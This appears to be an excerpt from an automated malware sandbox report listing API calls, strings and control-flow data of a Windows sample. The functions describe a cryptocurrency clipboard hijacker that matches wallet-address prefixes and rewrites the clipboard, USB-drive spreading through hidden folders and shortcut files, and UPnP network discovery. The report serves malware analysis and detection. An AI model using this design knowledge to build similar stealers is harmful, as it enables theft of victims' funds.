                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _chkstk.NTDLL(?,00406D30,?,?,?), ref: 004066B8
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004066EF
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040670F
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040672F
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040674F
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406768
                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406778
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067B1
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004067BE
                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067CB
                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067E0
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067F6
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00406803
                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406810
                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00406823
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 00406836
                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406843
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$ExistsPathwsprintf$Attributes$Delete$CreateDirectory_chkstk
                                                                                                                                                                                                                                                    • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveSecManager.exe$%s\*$shell32.dll$shell32.dll
                                                                                                                                                                                                                                                    • API String ID: 2467965697-1256475382
                                                                                                                                                                                                                                                    • Opcode ID: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                                                                                                                                                                                                    • Instruction ID: f76dd7f444767b2c43f85b167d980272eeebb95a9fd79305f50fc2a4155965b0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFD162B5900258ABCB20DF50DC44BEA77B8BB48304F0485EAF60AE6191D7B99BD4CF59
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 0040498C
                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D39
                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,cosmos), ref: 00404D61
                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,addr), ref: 00404D89
                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404DC4
                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,ronin:), ref: 00404DDB
                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,nano_), ref: 00404DF2
                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,bnb), ref: 004053A4
                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,bc1p), ref: 004053C0
                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,bc1q), ref: 004053DC
                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,ronin:), ref: 0040545F
                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00405479
                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,cosmos), ref: 00405493
                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,addr), ref: 004054AD
                                                                                                                                                                                                                                                    • StrStrW.SHLWAPI(00000000,nano_), ref: 004054C7
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004054DC
                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 004054F7
                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040550A
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,-00000001), ref: 00405528
                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405534
                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040553C
                                                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00405546
                                                                                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00405552
                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00405558
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockmemcpy
                                                                                                                                                                                                                                                    • String ID: 8$addr$addr$bc1p$bc1q$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$nano_$nano_$ronin:$ronin:$A
                                                                                                                                                                                                                                                    • API String ID: 2017104846-3944006828
                                                                                                                                                                                                                                                    • Opcode ID: f10c215015187a64e35910754edbf43630524a633ee39edfa593be9c6f415941
                                                                                                                                                                                                                                                    • Instruction ID: c0db1a85d2b2ab719742c03712a747d69443af7a5f19e9c3a62e09ec18ebafc2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f10c215015187a64e35910754edbf43630524a633ee39edfa593be9c6f415941
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2822A70600218EACB648F45C0945BE7BB2EF82755F60C06BE8496F294D77CDED1EB98

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                                                                                                                                    • String ID: Y
                                                                                                                                                                                                                                                    • API String ID: 673498613-3233089245
                                                                                                                                                                                                                                                    • Opcode ID: 94dc8271308eded007e7ea5b0fb9da388c093141b97384e1eb8e9f213d101719
                                                                                                                                                                                                                                                    • Instruction ID: c2d4c50a35bfe5f8cd224c9e55e2257f54aee963b80b02c573e24d91c8b8cf0b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94dc8271308eded007e7ea5b0fb9da388c093141b97384e1eb8e9f213d101719
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40D22A79D11619EFCB54CF99C18099EFBF1FF88360F62859AD845AB305C630AA91DF80

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 673498613-0
                                                                                                                                                                                                                                                    • Opcode ID: f562728b4ae2ad839a046a61e7ae0d2c61abff421672d19278971dcd63bd6e21
                                                                                                                                                                                                                                                    • Instruction ID: bf2a4b6287689beed617d1f95a7506b70f8f7bc33f40ac888a8e51c3a2640481
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f562728b4ae2ad839a046a61e7ae0d2c61abff421672d19278971dcd63bd6e21
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FD22A79D11619EFCB54CF99C18099EFBF1FF88360F62859AD845AB305C630AA91DF80

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 609 406570-4065bf CreateDirectoryW wsprintfW FindFirstFileW 610 4065c5-4065d9 lstrcmpW 609->610 611 40669f-4066a2 609->611 612 4065f1 610->612 613 4065db-4065ef lstrcmpW 610->613 615 40666c-406682 FindNextFileW 612->615 613->612 614 4065f3-40663c wsprintfW * 2 613->614 616 406656-406666 MoveFileExW 614->616 617 40663e-406654 call 406570 614->617 615->610 618 406688-406699 FindClose RemoveDirectoryW 615->618 616->615 617->615 618->611
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(ok@,00000000), ref: 0040657F
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406595
                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004065AC
                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,00411108), ref: 004065D1
                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,0041110C), ref: 004065E7
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040660A
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040662A
                                                                                                                                                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406666
                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 0040667A
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 0040668F
                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00406699
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*$ok@
                                                                                                                                                                                                                                                    • API String ID: 92872011-32713442
                                                                                                                                                                                                                                                    • Opcode ID: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                                                                                                                                                                                                    • Instruction ID: 6b6780eb73bc58f0ce40e07c43f053b4d902fc918dfc6bbc5558198ff1b4ac31
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB3127B5900218AFCB10DB60EC89FDA7778BB48701F4085A9F609A3195DB75DAD4CF58

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 621 405970-405992 GetWindowLongW 622 405994-40599b 621->622 623 4059b6-4059bd 621->623 626 4059a1-4059a5 622->626 627 405a27-405a38 IsClipboardFormatAvailable 622->627 624 4059e6-4059ec 623->624 625 4059bf 623->625 629 405a06-405a0a 624->629 630 4059ee-405a04 SetWindowLongW 624->630 628 405ba4-405bbd DefWindowProcA 625->628 633 4059c4-4059e1 SetClipboardViewer SetWindowLongW 626->633 634 4059a7-4059ab 626->634 631 405a43-405a4d IsClipboardFormatAvailable 627->631 632 405a3a-405a41 627->632 635 405a22 629->635 636 405a0c-405a1c SendMessageA 629->636 630->635 638 405a58-405a62 IsClipboardFormatAvailable 631->638 639 405a4f-405a56 631->639 637 405a6b-405a6f 632->637 633->628 640 4059b1 634->640 641 405b5d-405b9e RegisterRawInputDevices ChangeClipboardChain 634->641 635->628 636->635 643 405a75-405a7f OpenClipboard 637->643 644 405b3f-405b43 637->644 638->637 642 405a64 638->642 639->637 640->628 641->628 642->637 643->644 647 405a85-405a96 GetClipboardData 643->647 645 405b45-405b55 SendMessageA 644->645 646 405b5b 644->646 645->646 646->628 648 405a98 647->648 649 405a9d-405aae GlobalLock 647->649 648->628 650 405ab0 649->650 651 405ab5-405ac6 649->651 650->628 652 405ac8-405acc 651->652 653 405ae9-405afc call 405690 651->653 654 405afe-405b0e call 4057b0 652->654 655 405ace-405ad2 652->655 661 405b11-405b25 GlobalUnlock CloseClipboard 653->661 654->661 657 405ad4 655->657 658 405ad6-405ae7 call 405570 655->658 657->661 658->661 661->644 664 405b27-405b3c call 404970 call 40a1b0 661->664 664->644
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040597C
                                                                                                                                                                                                                                                    • SetClipboardViewer.USER32(?), ref: 004059C8
                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 004059DB
                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405A77
                                                                                                                                                                                                                                                    • GetClipboardData.USER32(00000000), ref: 00405A89
                                                                                                                                                                                                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
                                                                                                                                                                                                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405B9E
                                                                                                                                                                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BB4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3549449529-0
                                                                                                                                                                                                                                                    • Opcode ID: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                                                                                                                                                                                                    • Instruction ID: 2c6a07511b676f4089081adff438ee2b95572153aa6d486a7a165f398962c3b3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A711A74A00608EBDF14DFA4D988BAF77B4EF48301F14852AE505B6290D779AA80CF69
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00406BCE
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00415E58,00000104), ref: 00406BE0
                                                                                                                                                                                                                                                      • Part of subcall function 0040E770: CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                                                                                                                                                                                                      • Part of subcall function 0040E770: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                                                                                                                                                                                                      • Part of subcall function 0040E770: CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 00406D4A
                                                                                                                                                                                                                                                      • Part of subcall function 004063A0: GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                                                                                                                                                                                                      • Part of subcall function 004063A0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                                                                                                                                                                                                      • Part of subcall function 004063A0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                                                                                                                                                                                                      • Part of subcall function 004063A0: RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 00406D3D
                                                                                                                                                                                                                                                      • Part of subcall function 004062C0: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C7F
                                                                                                                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C94
                                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406CAF
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406CC2
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406CE2
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406D05
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                                                                                                                                    • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                                                                                                                                                    • API String ID: 1650488544-2117135753
                                                                                                                                                                                                                                                    • Opcode ID: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                                                                                                                                                                                                    • Instruction ID: f0476b63a1379e6dca01d87e2afc3553bbde202c422fcd3a3a6a752a7ad43008
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53418471900318ABEB14DB94DD45FEE7778BB44700F1045A9F20AA51D0DB785B94CF6A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                                                                                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                                                                                                                                                      • Part of subcall function 0040D130: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D14E
                                                                                                                                                                                                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                                                                                                                                                    • setsockopt.WS2_32 ref: 004020D1
                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 00402101
                                                                                                                                                                                                                                                    • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                                                                                                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                                                                                                                                                    • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                                                                                                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1603358586-0
                                                                                                                                                                                                                                                    • Opcode ID: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
                                                                                                                                                                                                                                                    • Instruction ID: bb6f584dfdc5104726d227d4109236b5a11985639f999f99e629cd7821b1dbc1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F41B270640301ABD3209F749C4AF4B77E4AF48710F108A2DF669EA2D4E7F4E845875A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                                                                                                                                                                                                    • htons.WS2_32(0000076C), ref: 0040D760
                                                                                                                                                                                                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                                                                                                                                                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA80: htons.WS2_32(00000050), ref: 0040AAAD
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA80: socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA80: connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA80: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                                                                                                                                                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                                                                                                                                                                                                    • sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                                                                                                                                                                                                      • Part of subcall function 0040D890: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                                                                                                                                                                                                      • Part of subcall function 0040D890: Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                                                                                                                                                                                                      • Part of subcall function 0040D890: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                                                                                                                                                                                                      • Part of subcall function 0040D890: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                                                                                                                                                                                                      • Part of subcall function 0040D890: StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                                                                                                                                    • String ID: 239.255.255.250
                                                                                                                                                                                                                                                    • API String ID: 726339449-2186272203
                                                                                                                                                                                                                                                    • Opcode ID: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                                                                                                                                                                                                    • Instruction ID: cd66526dcba05d1bd7c9b39ec2501b61c01db5f9fe0ef632d0235bd6d7545576
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F64137B5E00208EBDB04DFE4D889BEEBBB5AF48304F108169E515B7390E7B45A44CB69
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
